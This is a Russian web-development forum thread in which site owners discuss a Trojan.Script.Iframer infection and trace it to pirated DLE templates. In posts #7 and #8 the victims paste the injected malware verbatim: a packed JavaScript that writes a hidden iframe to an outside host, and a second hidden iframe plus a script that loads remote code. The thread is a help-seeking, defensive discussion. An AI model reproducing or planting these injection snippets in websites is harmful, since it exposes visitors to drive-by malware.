Помощник
 |
|
|
|
|
Сообщение сайта
 Троян Heur:trojan.script.iframer |
PahA
|
Сообщение
#1
|
||
 Бывалый  Группа: User Сообщений: 397 Регистрация: 12.6.2008 Поблагодарили: 49 раз Репутация:  6 
 |
|
||
 |
|
||
 |
vidik
|
 20.8.2009, 13:11;
Ответить: vidik
Сообщение
#2
|
 project manager Группа: Active User Сообщений: 963 Регистрация: 14.12.2008 Из: Costa Rica Поблагодарили: 191 раз Репутация: 39
|
.gife
 скачай сайт и проверь -------------------- |
|
|
|
|
jack
|
20.8.2009, 13:14;
Ответить: jack
Сообщение
#3
|
 ---------------- Группа: Administrator Сообщений: 8177 Регистрация: 22.3.2009 Из: глины Поблагодарили: 11555 раз Репутация: 615
|
(vidik @ 20.8.2009, 12:11)  .gife скачай сайт и проверь И поменяй пароли, раз он был, а теперь нету...не мог же он сам по себе исчезнуть. -------------------- |
|
|
|
|
PahA
|
Сообщение
#4
|
|
Бывалый Группа: User Сообщений: 397 Регистрация: 12.6.2008 Поблагодарили: 49 раз Репутация: 6
|
Уже качаю...
Проверил, касперский ничего не нашел... сейчас качаю полный бэкап с сервака может там че есть. Сообщение отредактировал PahA - 20.8.2009, 13:35 -------------------- |
|
|
|
|
toper
|
21.8.2009, 13:43;
Ответить: toper
Сообщение
#5
|
 Бывалый Группа: User Сообщений: 257 Регистрация: 19.8.2008 Поблагодарили: 271 раз Репутация: 22
|
Проверяйте файлы шаблонов, htacces. mod_rewrite рулит.
Файлы могут инклюдится с других сайтов. Судя по названия вируса - через фреймы. p.S> никогда не сохраняйте свой пароль на ФТП! Если на вашем сайте оказался вирус, то может быть 2 варианта: 1. дыры в безопасности php, попросите програмера всё проверить, изучите логи аппача. 2. Ваш комп был заражен, пароль на ФТП был запомнен галочкой и соответственно попал к злоумышленнику. То что каспер ничего не видит - еще не факт, были случае когда вирусы заражали самого каспера. Так чт опрежде чем "лечить" вирус на сайте - проверьтесь сами, например с помощью avz. p.p.s сделать всё надо быстро, иначе о трафике с поисковиков можно забыть, как и о трасте к домену. -------------------- |
|
|
|
|
iBBi
|
21.8.2009, 14:23;
Ответить: iBBi
Сообщение
#6
|
|
Участник Группа: User Сообщений: 227 Регистрация: 20.8.2009 Поблагодарили: 31 раз Репутация: 7
|
у кого либо были данные от фтп? пароль от фтп хранили в фтп менеджере?
|
|
|
|
|
PahA
|
Сообщение
#7
|
|
Бывалый Группа: User Сообщений: 397 Регистрация: 12.6.2008 Поблагодарили: 49 раз Репутация: 6
|
Все нашел. Было в файле login.php
<script LANGUAGE="Javascript"> eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c]);return p}('l p(8){q=B.C;c(q){r=s(\'t\');c(r==7){6 d=D E();d.F(d.G()+(H*u*u*I));e(\'t\',\'1\',d,"/");9.J("<v K=\'L://M.N.O/P/Q.R\' S=\'T:U\'></v>");V.W()}}}l s(8){6 m=8+"=";6 w=m.n;6 x=9.f.n;6 i=0;X(i<x){6 j=i+w;c(9.f.Y(i,j)==m)y Z(j);i=9.f.10(" ",i)+1;c(i==0)11}y 7}l e(8,z){6 a=e.A;6 b=e.A.n;6 g=(b>2)?a[2]:7;6 h=(b>3)?a[3]:7;6 k=(b>4)?a[4]:7;6 o=(b>5)?a[5]:12;9.f=8+"="+13(z)+((g==7)?"":("; g="+g.14()))+((h==7)?"":("; h="+h))+((k==7)?"":("; k="+k))+((o==15)?"; o":"")}9.16=p(8);',62,69,'||||||var|null|name|document|argv|argc|if|ExpDate|SetCookie|cookie|expires|p ath|||domain|function|arg|length|secure|PopShow3|CookieTest|ClickUndercookie|Get C ookie|clickunder|60|iframe|alen|clen|return|value|arguments|navigator|cookieEnab l ed|new|Date|setTime|getTime|48|1000|write|src|http|www|gameswar|ru|12345|stats|h t ml|style|display|none|window|focus|while|substring|getCookieVal|indexOf|break|fa l se|escape|toGMTString|true|onload'.split('|'),0,{})) </SCRIPT> Если кто расшифрует буду рад. Все дело в шаблонах, поставил, шаблоны с сайта 8dle. Автор neoks, скачал три его рипа и во всех эта "радость". З.Ы.: главное что когда ставил шаблон, или я не заметил, или просто не выходил из админки, или он только через определённое время работать начинает, так как он выводится только для незалогиненого юзера. З.З.Ы.: нет, ну я еще понимаю копирайт поставить... я б его оставил, мне ж не жалко. А пихать Trojan.Script.Iframer не стоит. З.З.Ы.: точнее во всех шаблонах neoks автора. Сообщение отредактировал PahA - 22.8.2009, 17:46 -------------------- |
|
|
|
|
fantom
|
2.2.2010, 20:18;
Ответить: fantom
Сообщение
#8
|
|
 Завсегдатай 
 Группа: Active User Сообщений: 702 Регистрация: 31.8.2008 Из: r030us Поблагодарили: 68 раз Репутация: 7
|
<iframe style='position:absolute;left:-4%;width:0%;top:-5%;height:0%;' src='http://www.gameswar.ru/12345/stats.html'></iframe>
<script language="JavaScript"> var ifpc_id = "7220"; var ifpc_url = document.location; var ifpc_rnd = Math.random(); document.write('<scr'+'ipt type="text/javascript" src="http://ifr'+'amepay.'+'com/t'+'ds/js.p'+'hp"></scr'+'ipt>'); </script></noindex> у меня тоже в одном шаблоне такая шляпа)) подскажите где он может сидеть)
Поблагодарили: (0) |
|
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
Лицензия на Shop script 8 + плагины | 2 | inetuser | 2974 | 17.1.2022, 23:30 автор: inetuser |
|
 MSE-Script - CMS для создания музыкальных сайтов и mp3 дорвеев |
0 | MSE-Script | 2737 | 13.12.2018, 15:40 автор: MSE-Script |
|
Создание скрипта парсера для Shop-Script 7 Webasyst | 0 | rokon | 916 | 26.10.2018, 13:54 автор: rokon |
|
Создание сайтов под ключ (joomla,WordPress, Shop-Script, Drupal, OpenCart) | 0 | papic | 1147 | 10.2.2015, 17:56 автор: papic |
|
Нужно сделать тему (шаблон) на webasyst shop script 5 | 0 | danila1980 | 1135 | 14.11.2013, 12:14 автор: danila1980 |
|
Текстовая версия | Сейчас: 20.4.2024, 5:13 |
